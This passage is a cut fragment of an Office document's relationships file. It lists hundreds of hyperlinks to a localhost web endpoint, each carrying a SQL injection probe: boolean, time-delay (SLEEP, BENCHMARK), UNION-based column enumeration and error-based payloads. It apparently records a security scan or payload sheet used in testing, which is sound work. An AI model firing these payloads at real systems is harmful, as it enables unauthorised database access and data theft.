Target="http://localhost:9999/category/view?id=3IF(7423=7424)%20SELECT%207423%20ELSE%20DROP%20FUNCTION%20xcjl--" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29" TargetMode="External"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14" TargetMode="External"/><Relationship Id="rId578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00" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%23" TargetMode="External"/><Relationship Id="rId438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)))%23" TargetMode="External"/><Relationship Id="rId603" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4346=4347)%20THEN%200x61646d696e%20ELSE%200x28%20END))%20AND%20'Txws'='" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4" TargetMode="External"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23" TargetMode="External"/><Relationship Id="rId491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12" TargetMode="External"/><Relationship Id="rId505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20WHERE%201=1%20AND%201=0%23" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%209%23%20" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%201%20" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3&amp;&amp;SLEEP(5)--" TargetMode="External"/><Relationship Id="rId547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8%23" TargetMode="External"/><Relationship Id="rId589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%207300=7300%20AND%20'pKlZ'='pKlZ" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2020%23%20" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10%23" TargetMode="External"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25" TargetMode="External"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId40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--%20" TargetMode="External"/><Relationship Id="rId44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%23" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),3,4--%20" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15" TargetMode="External"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%23" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11--%20" TargetMode="External"/><Relationship Id="rId460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))" TargetMode="External"/><Relationship Id="rId516" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7--%20" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%209--%20" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2012%20" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--%20" TargetMode="External"/><Relationship Id="rId558" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7%23" TargetMode="External"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)))--%20" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5(%27A%27)),4,5,6,7,8,9,10,11,12,13,14--%20" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26" TargetMode="External"/><Relationship Id="rId47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" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20HAVING%201=0%23" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2020--%20" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2023%20" TargetMode="External"/><Relationship Id="rId527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--%20" TargetMode="External"/><Relationship Id="rId569" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2031337--%20" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5" TargetMode="External"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18%23" TargetMode="External"/><Relationship Id="rId42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--%20" TargetMode="External"/><Relationship Id="rId580" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%207300=7300%20AND%20('pKlZ'='pKlY" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20" TargetMode="External"/><Relationship Id="rId440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))%23" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=1" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7%23" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2--%20" TargetMode="External"/><Relationship Id="rId482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3" TargetMode="External"/><Relationship Id="rId538" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--%20" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2011%23%20" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3sleep(5)%23" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%20SLEEP(5)%23" TargetMode="External"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16" TargetMode="External"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23" TargetMode="External"/><Relationship Id="rId591" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3'&amp;&amp;SLEEP(5)&amp;&amp;'1" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%23" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20WHERE%201=1%20AND%201=0--" TargetMode="External"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%23" TargetMode="External"/><Relationship Id="rId45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%23" TargetMode="External"/><Relationship Id="rId493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14" TargetMode="External"/><Relationship Id="rId507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28" TargetMode="External"/><Relationship Id="rId549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10%23" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2011--%20" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%203%20" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12%23" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13--%20" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27" TargetMode="External"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId409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--%20" TargetMode="External"/><Relationship Id="rId560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2022%23%20" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--%20" TargetMode="External"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--%20" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23" TargetMode="External"/><Relationship Id="rId462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))" TargetMode="External"/><Relationship Id="rId518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9--%20" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2014%20" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--%20" TargetMode="External"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9%23" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2022--%20" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23" TargetMode="External"/><Relationship Id="rId571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=-5703%27%20UNION%20ALL%20SELECT%2067,CONCAT(0x7162716b71,0x706a6e686868707941774a4f467a6f794e4d6773597173727a75566868625a6d43754f4772684552,0x716b717a71),67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67--%20-" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20HAVING%201=0--%20" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16--%20" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28" TargetMode="External"/><Relationship Id="rId43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--%20" TargetMode="External"/><Relationship Id="rId47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" TargetMode="External"/><Relationship Id="rId529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--%20" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=1%23" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2025%20" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7" TargetMode="External"/><Relationship Id="rId540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX'%23" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%202%23%20" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23" TargetMode="External"/><Relationship Id="rId582" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%207300=7300%20AND%20'pKlZ'='pKlY" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%201=0" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--%20" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9%23" TargetMode="External"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))%23" TargetMode="External"/><Relationship Id="rId484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%22%20or%20sleep(5)%23" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4--%20" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%202--%20" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2013%23%20" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),3%23" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20USER()--%20" TargetMode="External"/><Relationship Id="rId551" 